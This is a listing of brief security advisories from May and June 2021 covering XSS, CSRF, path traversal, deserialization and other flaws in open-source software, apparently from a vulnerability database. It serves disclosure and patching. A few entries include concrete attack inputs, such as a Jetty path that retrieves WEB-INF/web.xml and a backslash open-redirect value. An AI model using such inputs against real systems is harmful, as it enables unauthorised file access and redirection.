Advisories

Jun 2021

Cross-site Scripting in Apache Airflow

The "origin" parameter passed to some of the endpoints like '/trigger' was vulnerable to XSS exploit. This issue affects Apache Airflow versions <1.10.15 in 1.x series and affects 2.0.0 and 2.0.1 and 2.x series. This is the same as CVE-2020-13944 & CVE-2020-17515 but the implemented fix did not fix the issue completely. Update to Airflow 1.10.15 or 2.0.2. Please also update your Python version to the latest available PATCH releases …

CRLF injection in urllib3

urllib3 before 1.25.9 allows CRLF injection if the attacker controls the HTTP request method, as demonstrated by inserting CR and LF control characters in the first argument of putrequest(). NOTE: this is similar to CVE-2020-26116.

Access of Resource Using Incompatible Type (Type Confusion)

The npm package striptags is an implementation of PHP's strip_tags in Typescript. In striptags, a type-confusion vulnerability can cause striptags to concatenate unsanitized strings when an array-like object is passed in as the html parameter. This can be abused by an attacker who can control the shape of their input, e.g. if query parameters are passed directly into the function. This can lead to a XSS.

Improper Authentication

Symfony is a PHP framework for web and console applications and a set of reusable PHP components. A vulnerability related to firewall authentication is in Symfony starting with When an application defines multiple firewalls, the token authenticated by one of the firewalls was available for all other firewalls. This could be abused when the application defines different providers for each part of the application, in such a situation, a user …

Cross-site Scripting in wagtail

When the {% include_block %} template tag is used to output the value of a plain-text StreamField block (CharBlock, TextBlock or a similar user-defined block derived from FieldBlock), and that block does not specify a template for rendering, the tag output is not properly escaped as HTML. This could allow users to insert arbitrary HTML or scripting. This vulnerability is only exploitable by users with the ability to author StreamField …

Uncontrolled Resource Consumption

JPA Server in HAPI FHIR before 5.4.0 allows a user to deny service (e.g., disable access to the database after the attack stops) via history requests. This occurs because of a SELECT COUNT statement that requires a full index scan, with an accompanying large amount of server resources if there are many simultaneous history requests.

Origin Validation Error

Apache Maven will follow repositories that are defined in a dependency’s Project Object Model (pom) which may be surprising to some users, resulting in potential risk if a malicious actor takes over that repository or is able to insert themselves into a position to pretend to be that repository. Maven is changing the default behavior in 3.8.1+ to no longer follow http (non-SSL) repository references by default. More details available …

Origin Validation Error

Apache Maven will follow repositories that are defined in a dependency’s Project Object Model (pom) which may be surprising to some users, resulting in potential risk if a malicious actor takes over that repository or is able to insert themselves into a position to pretend to be that repository. Maven is changing the default behavior in 3.8.1+ to no longer follow http (non-SSL) repository references by default. More details available …

Improper Verification of Cryptographic Signature

tEnvoy contains the PGP, NaCl, and PBKDF2 in node.js and the browser (hashing, random, encryption, decryption, signatures, conversions), used by TogaTech.org., the verifyWithMessage method of tEnvoyNaClSigningKey always returns true for any signature that has a SHA-512 hash matching the SHA-512 hash of the message even if the signature was invalid.

Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')

A Server-Side Template Injection was identified in Apache Syncope prior to 2.1.6 enabling attackers to inject arbitrary Java EL expressions, leading to an unauthenticated Remote Code Execution (RCE) vulnerability. Apache Syncope uses Java Bean Validation (JSR 380) custom constraint validators. When building custom constraint violation error messages, they support different types of interpolation, including Java EL expressions. Therefore, if an attacker can inject arbitrary data in the error message template …

Improper Authentication

The optional ActiveMQ LDAP login module can be configured to use anonymous access to the LDAP server. In this case, for Apache ActiveMQ Artemis prior to version 2.16.0 and Apache ActiveMQ prior to versions 5.16.1 and 5.15.14, the anonymous context is used to verify a valid users password in error, resulting in no check on the password.

Improper Authentication

The optional ActiveMQ LDAP login module can be configured to use anonymous access to the LDAP server. In this case, for Apache ActiveMQ Artemis prior to version 2.16.0 and Apache ActiveMQ prior to versions 5.16.1 and 5.15.14, the anonymous context is used to verify a valid users password in error, resulting in no check on the password.

Improper Authentication

Broken Authentication in Atlassian Connect Spring Boot (ACSB) in version 1.1.0 before 2.1.3 and from version 2.1.4 before 2.1.5: Atlassian Connect Spring Boot is a Java Spring Boot package for building Atlassian Connect apps. Authentication between Atlassian products and the Atlassian Connect Spring Boot app occurs with a server-to-server JWT or a context JWT. Atlassian Connect Spring Boot versions 1.1.0 before 2.1.3 and versions 2.1.4 before 2.1.5 erroneously accept context …

Improper Authentication

Apollos Apps is an open source platform for launching church-related apps. In Apollos Apps, new user registrations are able to access anyone's account by only knowing their basic profile information (name, birthday, gender, etc). This includes all app functionality within the app, as well as any authenticated links to Rock-based webpages (such as giving and events). There is a patch As a workaround, one can patch one's server by overriding …

Cross-Site Request Forgery (CSRF)

In the default configuration, Apache MyFaces Core versions 2.2.0 to 2.2.13, 2.3.0 to 2.3.7, 2.3-next-M1 to 2.3-next-M4, and 3.0.0-RC1 use cryptographically weak implicit and explicit cross-site request forgery (CSRF) tokens. Due to that limitation, it is possible (although difficult) for an attacker to calculate a future CSRF token value and to use that value to trick a user into executing unwanted actions on an application.

Code Injection

Valine allows remote attackers to cause a denial of service (application outage) by supplying a ua (aka User-Agent) value that only specifies the product and version.

Open redirect in Flask-Unchained

This affects the package Flask-Unchained before 0.9.0. When using the the _validate_redirect_url function, it is possible to bypass URL validation and redirect a user to an arbitrary URL by providing multiple back slashes such as \evil.com/path. This vulnerability is only exploitable if an alternative WSGI server other than Werkzeug is used, or the default behaviour of Werkzeug is modified using 'autocorrect_location_header=False.

Insufficiently random values in Ansible

A flaw was found in the use of insufficiently random values in Ansible. Two random password lookups of the same length generate the equal value as the template caching action for the same file since no re-evaluation happens. The highest threat from this vulnerability would be that all passwords are exposed at once for the file. This flaw affects Ansible Engine versions before 2.9.6.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

A reflected Cross-Site Scripting (XSS) flaw was found in RESTEasy in all versions of RESTEasy up to 4.6.0.Final, where it did not properly handle URL encoding when calling @javax.ws.rs.PathParam without any @Produces MediaType. This flaw allows an attacker to launch a reflected XSS attack. The highest threat from this vulnerability is to data confidentiality and integrity.

Duplicate Advisory: Path Traversal in Zope

Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-5pr9-v234-jw36. This link is maintained to preserve external references. Original Description Zope is an open-source web application server. In Zope versions prior to 4.6 and 5.2, users can access untrusted modules indirectly through Python modules that are available for direct use. By default, only users with the Manager role can add or edit Zope Page Templates through …

Path Traversal

elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched As a workaround, ensure the connector is not exposed without authentication.

Uncontrolled Resource Consumption

The actionpack ruby gem suffers from a possible denial of service vulnerability in the Token Authentication logic in Action Controller due to a too permissive regular expression. Impacted code uses authenticate_or_request_with_http_token or authenticate_with_http_token for request authentication.

Uncontrolled Resource Consumption

The actionpack ruby gem (a framework for handling and responding to web requests in Rails) suffers from a possible denial of service vulnerability in the Mime type parser of Action Dispatch. Carefully crafted Accept headers can cause the mime type parser in Action Dispatch to do catastrophic backtracking in the regular expression engine.

Uncontrolled Resource Consumption

There is a possible DoS vulnerability in the Token Authentication logic in Action Controller. Impacted code uses authenticate_or_request_with_http_token or authenticate_with_http_token for request authentication.

Uncontrolled Resource Consumption

There is a possible Denial of Service vulnerability in Action Dispatch. Carefully crafted Accept headers can cause the mime type parser in Action Dispatch to do catastrophic backtracking in the regular expression engine.

Cross-site Scripting

Cross-site scripting vulnerability in Drupal Core allows an attacker to leverage the way that HTML is rendered for affected forms in order to exploit the vulnerability.

Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)

An issue was discovered in Rclone before 1.53.3. Due to the use of a weak random number generator, the password generator has been producing weak passwords with much less entropy than advertised. The suggested passwords depend deterministically on the time the second rclone was started. This limits the entropy of the passwords enormously. These passwords are often used in the crypt backend for encryption of data. It would be possible …

Reachable Assertion

There is an Assertion 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' failed at js-parser-expr.c:3230 in parser_parse_object_initializer in JerryScript

Reachable Assertion

There is an Assertion in '(flags >> CBC_STACK_ADJUST_SHIFT) >= CBC_STACK_ADJUST_BASE || (CBC_STACK_ADJUST_BASE - (flags >> CBC_STACK_ADJUST_SHIFT)) <= context_p->stack_depth' in parser_emit_cbc_backward_branch in JerryScript

Reachable Assertion

There is an Assertion in 'context_p->token.type == LEXER_RIGHT_BRACE || context_p->token.type == LEXER_ASSIGN || context_p->token.type == LEXER_COMMA' in parser_parse_object_initializer in JerryScript

Reachable Assertion

There is an Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at js-parser-statm.c:733 in parser_parse_function_statement in JerryScript

Path Traversal in Django

Django before 2.2.24, 3.x before 3.1.12, and 3.2.x before 3.2.4 has a potential directory traversal via django.contrib.admindocs. Staff members could use the TemplateDetailView view to check the existence of arbitrary files. Additionally, if (and only if) the default admindocs templates have been customized by application developers to also show file contents, then not only the existence but also the file contents would have been exposed. In other words, there is …

Duplicate Advisory: Reflected cross-site scripting issue in Datasette

Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-xw7c-jx9m-xh5g. This link is maintained to preserve external references. Original Description Datasette is an open source multi-tool for exploring and publishing data. The ?_trace=1 debugging feature in Datasette does not correctly escape generated HTML, resulting in a reflected cross-site scripting vulnerability. This vulnerability is particularly relevant if your Datasette installation includes authenticated features using plugins such as …

Duplicate Advisory: Path Traversal in Zope

Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-5pr9-v234-jw36. This link is maintained to preserve external references. Original Description Zope is an open-source web application server. This advisory extends the previous advisory at https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36 with additional cases of TAL expression traversal vulnerabilities. Most Python modules are not available for using in TAL expressions that you can add through-the-web, for example in Zope Page Templates. This …

Cross-site Scripting

A reflected Cross-Site Scripting (XSS) flaw was found in RESTEasy. It does not properly handle URL encoding when calling @javax.ws.rs.PathParam without any @Produces MediaType. This flaw allows an attacker to launch a reflected XSS attack. The highest threat from this vulnerability is to data confidentiality and integrity.

Cross-Site Request Forgery (CSRF) in FastAPI

FastAPI versions lower than 0.65.2 that used cookies for authentication in path operations that received JSON payloads sent by browsers were vulnerable to a Cross-Site Request Forgery (CSRF) attack. In versions lower than 0.65.2, FastAPI would try to read the request payload as JSON even if the content-type header sent was not set to application/json or a compatible JSON media type (e.g. application/geo+json). So, a request with a content type …

Time-of-check Time-of-use (TOCTOU) Race Condition

A flaw was found in Ansible if an ansible user sets ANSIBLE_ASYNC_DIR to a subdirectory of a world writable directory. When this occurs, there is a race condition on the managed machine. A malicious, non-privileged account on the remote machine can exploit the race condition to access the async result data. This flaw affects Ansible Tower and Ansible Automation Platform

Path Traversal in pip

The pip package before 19.2 for Python allows Directory Traversal when a URL is given in an install command, because a Content-Disposition header can have ../ in a filename, as demonstrated by overwriting the /root/.ssh/authorized_keys file. This occurs in _download_http_url in _internal/download.py. A fix was committed 6704f2ace.

Insufficient Session Expiration in OpenStack Keystone

An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. The list of roles provided for an OAuth1 access token is silently ignored. Thus, when an access token is used to request a keystone token, the keystone token contains every role assignment the creator had for the project. This results in the provided keystone token having more role assignments than the creator intended, possibly giving unintended escalated access.

Information Exposure

In Eclipse Jetty it is possible for requests to the ConcatServlet with a doubly encoded path to access protected resources within the WEB-INF directory. For example a request to /concat?/%2557EB-INF/web.xml can retrieve the web.xml file. This can reveal sensitive information regarding the implementation of a web application.

Header injection possible in Django

In Django 2.2 before 2.2.22, 3.1 before 3.1.10, and 3.2 before 3.2.2 (with Python 3.9.5+), URLValidator does not prohibit newlines and tabs (unless the URLField form field is used). If an application uses values with newlines in an HTTP response, header injection can occur. Django itself is unaffected because HttpResponse prohibits newlines in HTTP headers.

Cross-site Scripting

A cross-site scripting (XSS) vulnerability in the HTML Data Processor in CKEditor 4 allows remote attackers to inject executable JavaScript code through a crafted comment

Cross-site Scripting

A cross-site scripting (XSS) vulnerability in the HTML Data Processor in CKEditor 4 allows remote attackers to inject executable JavaScript code through a crafted comment.

Uncontrolled Resource Consumption in Pillow

An issue was discovered in Pillow before 8.2.0. For EPS data, the readline implementation used in EPSImageFile has to deal with any combination of \r and \n as line endings. It used an accidentally quadratic method of accumulating lines while looking for a line ending. A malicious EPS file could use this to perform a DoS of Pillow in the open phase, before an image was accepted for opening.

Uncontrolled Resource Consumption

A vulnerability was discovered in XNIO where file descriptor leak caused by growing amounts of NIO Selector file handles between garbage collection cycles. It may allow the attacker to cause a denial of service. It affects XNIO versions 3.6.0.Beta1 through 3.8.1.Final.

Privilege Context Switching Error

A flaw was found in wildfly. The EJBContext principle is not popped back after invoking another EJB using a different Security Domain. The highest threat from this vulnerability is to data confidentiality and integrity. Versions before wildfly 20.0.0.Final are affected.

Pillow denial of service

An issue was discovered in Pillow before 8.2.0. PSDImagePlugin.PsdImageFile lacked a sanity check on the number of input layers relative to the size of the data block. This could lead to a DoS on Image.open prior to Image.load.

Out-of-bounds Write

A heap-buffer overflow was found in the copyIntoFrameBuffer function of OpenEXR An attacker could use this flaw to execute arbitrary code with the permissions of the user running the application compiled against OpenEXR.

Integer Underflow (Wrap or Wraparound)

An integer overflow leading to a heap-buffer overflow was found in the DwaCompressor of OpenEXR An attacker could use this flaw to crash an application compiled with OpenEXR. This is a different flaw from CVE-2021-23215.

Insufficient Session Expiration

HashiCorp Vault and Vault Enterprise allowed the renewal of nearly-expired token leases and dynamic secret leases (specifically, those within 1 second of their maximum TTL), which caused them to be incorrectly treated as non-expiring during subsequent use. Fixed in 1.5.9, 1.6.5, and 1.7.2.

Incorrect Authorization

A vulnerability was found in OVN Kubernetes in versions up to and including 0.3.0 where the Egress Firewall does not reliably apply firewall rules when there is multiple DNS rules. It could lead to potentially lose of confidentiality, integrity or availability of a service.

Improper Restriction of XML External Entity Reference

SilverStripe has an XXE Vulnerability in CSSContentParser. A developer utility meant for parsing HTML within unit tests can be vulnerable to XML External Entity (XXE) attacks. When this developer utility is misused for purposes involving external or user submitted data in custom project code, it can lead to vulnerabilities such as XSS on HTML output rendered through this custom code. This is now mitigated by disabling external entities during parsing.

Improper Preservation of Permissions

An incorrect access control flaw was found in the kiali-operator in versions before 1.33.0 and before 1.24.7. This flaw allows an attacker with a basic level of access to the cluster (to deploy a kiali operand) to use this vulnerability and deploy a given image to anywhere in the cluster, potentially gaining access to privileged service account tokens. The highest threat from this vulnerability is to data confidentiality and integrity …

Cross-site Scripting

In ICEcoder allows, a reflected XSS vulnerability was identified in the multipe-results.php page due to insufficient sanitization of the _GET['replace'] variable. As a result, arbitrary Javascript code can get executed.

Reflected cross-site scripting issue in Datasette

The ?_trace=1 debugging feature in Datasette does not correctly escape generated HTML, resulting in a reflected cross-site scripting vulnerability. This vulnerability is particularly relevant if your Datasette installation includes authenticated features using plugins such as datasette-auth-passwords as an attacker could use the vulnerability to access protected data.

Improper Certificate Validation

WP-CLI is the command-line interface for WordPress. An improper error handling in HTTPS requests management in WP-CLI allows remote attackers able to intercept the communication to remotely disable the certificate verification on WP-CLI side, gaining full control over the communication content, including the ability to impersonate update servers and push malicious updates towards WordPress instances controlled by the vulnerable WP-CLI agent, or push malicious updates toward WP-CLI itself. The vulnerability …

Unrestricted Upload of File with Dangerous Type

Backstage is an open platform for building developer portals, and techdocs-common contains common functionalities for Backstage's TechDocs. In versions of @backstage/tehdocs-common prior to 0.6.4, a malicious internal actor is able to upload documentation content with malicious scripts. These scripts would normally be sanitized by the TechDocs frontend, but by tricking a user to visit the content via the TechDocs API, the content sanitazion will be bypassed. If the TechDocs API …

Unrestricted Upload of File with Dangerous Type

Backstage is an open platform for building developer portals. In versions of Backstage's Techdocs Plugin (@backstage/plugin-techdocs), a malicious internal actor can potentially upload documentation content with malicious scripts by embedding the script within an object element. This may give access to sensitive data when other users visit that same documentation page. The ability to upload malicious content may be limited by internal code review processes, unless the chosen TechDocs deployment …

Path Traversal in Django

In Django 2.2 before 2.2.21, 3.1 before 3.1.9, and 3.2 before 3.2.1, MultiPartParser, UploadedFile, and FieldFile allowed directory traversal via uploaded files with suitably crafted file names.

Improper Input Validation

A flaw was found in Hibernate Validator version 6.1.2.Final. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.

django-celery-results Stores Sensitive Information In Cleartext

django-celery-results prior to 2.4.0 stores task results in the database. Among the data it stores are the variables passed into the tasks. The variables may contain sensitive cleartext information that does not belong unencrypted in the database. In version 2.4.0 this is no longer the default behaviour but can be re-enabled with the result_extended flag in which case care should be taken to ensure any sensitive variables are scrubbed - …

Cross-site Scripting

auth0-lock is Auth0's signin solution. Versions of nauth0-lock before and including 11.30.0 are vulnerable to reflected XSS. An attacker can execute arbitrary code when the library's flashMessage feature is utilized and user input or data from URL parameters is incorporated into the flashMessage or the library's languageDictionary feature is utilized and user input or data from URL parameters is incorporated into the languageDictionary.

Path Traversal

Backstage is an open platform for building developer portals, and techdocs-common contains common functionalities for Backstage's TechDocs. In @backstage/techdocs-common, a malicious actor could read sensitive files from the environment where TechDocs documentation is built and published by setting a particular path for docs_dir in mkdocs.yml.

Prototype Pollution

The merge-deep library for Node.js can be tricked into overwriting properties of Object.prototype or adding new properties to it. These properties are then inherited by every object in the program, thus facilitating prototype-pollution attacks against applications using this library.

Out-of-bounds Write

There's a flaw in lz4. An attacker who submits a crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential impact to confidentiality and integrity as well.

Use After Free

There's a flaw in libxml2's xmllint An attacker who is able to submit a crafted file to be processed by xmllint could trigger a use-after-free. The greatest impact of this flaw is to confidentiality, integrity, and availability.

Use After Free

There's a flaw in libxml2's xmllint An attacker who is able to submit a crafted file to be processed by xmllint could trigger a use-after-free. The greatest impact of this flaw is to confidentiality, integrity, and availability.

Permissions bypass in KubeVirt

A flaw was found in the KubeVirt main virt-handler versions before 0.26.0 regarding the access permissions of virt-handler. An attacker with access to create VMs could attach any secret within their namespace, allowing them to read the contents of that secret.

Out-of-bounds Write

Libjpeg-turbo all version have a stack-based buffer overflow in the "transform" component. A remote attacker can send a malformed jpeg file to the service and cause arbitrary code execution or denial of service of the target service.

Insertion of Sensitive Information into Log File in ansible

A flaw was found in ansible module where credentials are disclosed in the console log by default and not protected by the security feature when using the bitbucket_pipeline_variable module. This flaw allows an attacker to steal bitbucket_pipeline credentials. The highest threat from this vulnerability is to confidentiality.

Insertion of Sensitive Information into Log File in ansible

A flaw was found in ansible. Credentials, such as secrets, are being disclosed in console log by default and not protected by no_log feature when using those modules. An attacker can take advantage of this information to steal those credentials. The highest threat from this vulnerability is to data confidentiality.

Incorrect Authorization

A flaw was found in the BPMN editor. Any authenticated user from any project can see the name of Ruleflow Groups from other projects, despite the user not having access to those projects. The highest threat from this vulnerability is to confidentiality.

Improper Verification of Cryptographic Signature in aws-encryption-sdk-javascript

This ESDK supports a streaming mode where callers may stream the plaintext of signed messages before the ECDSA signature is validated. In addition to these signatures, the ESDK uses AES-GCM encryption and all plaintext is verified before being released to a caller. There is no impact on the integrity of the ciphertext or decrypted plaintext, however some callers may rely on the the ECDSA signature for non-repudiation. Without validating the …

Improper Restriction of Communication Channel to Intended Endpoints

Singularity is an open source container platform. In verions 3.7.2 and 3.7.3, Dde to incorrect use of a default URL, singularity action commands (run/shell/exec) specifying a container using a library:// URI will always attempt to retrieve the container from the default remote endpoint (cloud.sylabs.io) rather than the configured remote endpoint. An attacker may be able to push a malicious container to the default remote endpoint with a URI that is …

Deserialization of Untrusted Data

Each Apache Dubbo server will set a serialization id to tell the clients which serialization protocol it is working on. But for Dubbo, an attacker can choose which serialization id the Provider will use by tampering with the byte preamble flags, aka, not following the server's instruction. This means that if a weak deserializer such as the Kryo and FST are somehow in code scope (e.g. if Kryo is somehow …

Deserialization of Untrusted Data

Apache Dubbo by default supports generic calls to arbitrary methods exposed by provider interfaces. These invocations are handled by the GenericFilter which will find the service and method specified in the first arguments of the invocation and use the Java Reflection API to make the final call. The signature for the $invoke or $invokeAsync methods is Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object; where the first argument is the name of the method to invoke, the …

Code Injection

Apache Dubbo supports Script routing which will enable a customer to route the request to the right server. These rules are used by the customers when making a request in order to find the right endpoint. When parsing these rules, Dubbo customers use ScriptEngine and run the rule provided by the script which by default may enable executing arbitrary code.

Authentication Bypass by Spoofing

An authentication bypass vulnerability was found in Kiali in versions before 1.31.0 when the authentication strategy OpenID is used. When RBAC is enabled, Kiali assumes that some of the token validation is handled by the underlying cluster. When OpenID implicit flow is used with RBAC turned off, this token validation doesn't occur, and this allows a malicious user to bypass the authentication.

May 2021

Argument Injection or Modification

An argument injection vulnerability in the Dragonfly gem for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.

Out-of-bounds Write

A flaw was found in the ZeroMQ server This flaw allows a malicious client to cause a stack buffer overflow on the server by sending crafted topic subscription requests and then unsubscribing. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.

Improper Neutralization of Special Elements used in a Command ('Command Injection') in @floffah/build

Impact If you are using the esbuild target or command you are at risk of code/option injection. Attackers can use the command line option to maliciously change your settings in order to damage your project. Patches The problem has been patched in v1.0.0 as it uses a proper method to pass configs to esbuild/estrella. Workarounds There is no work around. You should update asap. Notes This notice is mainly just …

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Http4s is a Scala interface for HTTP services. StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns F[None], indicating no resource, if url.getFile is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL …

Improper Input Validation

A flaw was found in keycloak A Self Stored XSS attack vector escalating to a complete account takeover is possible due to user-supplied data fields not being properly encoded and Javascript code being used to process the data. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Use of Incorrectly-Resolved Name or Reference

runc through 1.0.0-rc9 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. (This vulnerability does not affect Docker due to an implementation detail that happens to block the attack.)

URL Redirection to Untrusted Site (Open Redirect)

Tenancy multi-tenant is an open source multi-domain controller for the Laravel web framework. In some situations, it is possible to have open redirects where users can be redirected from your site to any other site using a specially crafted URL. This is only the case for installations where the default Hostname Identification is used and the environment uses tenants that have force_https set to true (the default is false).

Reliance on Reverse DNS Resolution for a Security-Critical Action

In Weave Net before version 2.6.3, an attacker able to run a process as root in a container is able to respond to DNS requests from the host and thereby insert themselves as a fake service. In a cluster with an IPv4 internal network, if IPv6 is not totally disabled on the host (via ipv6.disable=1 on the kernel cmdline), it will be either unconfigured or configured on some interfaces, but …

Path Traversal

runc allows a Container Filesystem Breakout via Directory Traversal. To exploit the vulnerability, an attacker must be able to create multiple containers with a fairly specific mount configuration. The problem occurs via a symlink-exchange attack that relies on a race condition.

Path Traversal

Http4s is a Scala interface for HTTP services. StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns F[None], indicating no resource, if url.getFile is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL …

Out-of-bounds Write

Tendermint before versions 0.33.3, 0.32.10, and 0.31.12 has a denial-of-service vulnerability. Tendermint does not limit the number of P2P connection requests. For each p2p connection, it allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. Additionally, Tendermint does not reclaim activeID of a …

Out-of-bounds Write

Tendermint before versions 0.33.3, 0.32.10, and 0.31.12 has a denial-of-service vulnerability. Tendermint does not limit the number of P2P connection requests. For each p2p connection, it allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. Additionally, Tendermint does not reclaim activeID of a …

Listing of upload directory contents possible

There's an security issue in prosody-filer versions < 1.0.1 which leads to unwanted directory listings of download directories. An attacker is able to list previous uploads of a certain user by shortening the URL and accessing a URL subdirectors other than /upload/ (or the corresponding user defined root dir) Version 1.0.1 and later fix this problem and allow only direct file access if the full path is known. Directory listings …

Incorrect Authorization

Istio has a remotely exploitable vulnerability where an HTTP request path with multiple slashes or escaped slash characters (%2F or %5C) could potentially bypass an Istio authorization policy when path based authorization rules are used.

Improper Privilege Management

Spring Framework WebFlux applications are vulnerable to a privilege escalation. By (re)creating the temporary storage directory, a locally authenticated malicious user can read or modify files that have been uploaded to the WebFlux application, or overwrite arbitrary files with multipart request data.

Exposure of Sensitive Information to an Unauthorized Actor

Their is an information disclosure vulnerability in Helm from version 3.1.0 and before version 3.2.0. lookup is a Helm template function introduced in Helm v3. It is able to lookup resources in the cluster to check for the existence of specific resources and get details about them. This can be used as part of the process to render templates. The documented behavior of helm template states that it does not …

Authentication Bypass by Capture-replay

In Hydra (an OAuth2 Server and OpenID Certified™ OpenID Connect Provider written in Go), before version 1.4.0+oryOS.17, when using client authentication method 'private_key_jwt' [1], OpenId specification says the following about assertion jti: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not check the uniqueness …

Authentication Bypass by Capture-replay

In Hydra (an OAuth2 Server and OpenID Certified™ OpenID Connect Provider written in Go), before version 1.4.0+oryOS.17, when using client authentication method 'private_key_jwt' [1], OpenId specification says the following about assertion jti: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not check the uniqueness …

URL Redirection to Untrusted Site ('Open Redirect')

OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the allowlist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if a allowlist domain was configured for …

URL Redirection to Untrusted Site ('Open Redirect')

OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the allowlist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if a allowlist domain was configured for …

Uncontrolled Resource Consumption

ws is an open source WebSocket client and server library for Node. In vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers.

Incorrect Authorization

Pion WebRTC before 3.0.15 didn't properly tear down the DTLS Connection when certificate verification failed. The PeerConnectionState was set to failed, but a user could ignore that and continue to use the PeerConnection. )A WebRTC implementation shouldn't allow the user to continue if verification has failed.)

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting since there is no validation on the input being sent to the name parameter in noticeWizard endpoint. Due to this flaw an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files.

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting, since the function validateFormInput() performs improper validation checks on the input sent to the groupName and groupComment parameters. Due to this flaw, an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files which can cause severe damage to the organization using opennms.

Improper Input Validation

A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application causing a possible denial of service on either the internal infrastructure or the web application …

Improper Input Validation

A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application causing a possible denial of service on either the internal infrastructure or the web application …

Cross-Site Request Forgery (CSRF)

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 is vulnerable to CSRF, due to no CSRF protection, and since there is no validation of an existing user name while renaming a user. As a result, privileges of the renamed user are being overwritten by the old user and the old user is being deleted from the user list.

Cross-Site Request Forgery (CSRF)

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection at /opennms/admin/userGroupView/users/updateUser. This flaw allows assigning ROLE_ADMIN security role to a normal user. Using this flaw, an attacker can trick the admin user to assign administrator privileges to a normal user by enticing him to click upon an attacker-controlled website.

Cross-Site Request Forgery (CSRF)

In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection, and since there is no validation of an existing user name while renaming a user. As a result, privileges of the renamed user are being overwritten by the old user and the old user is being deleted from the user list.

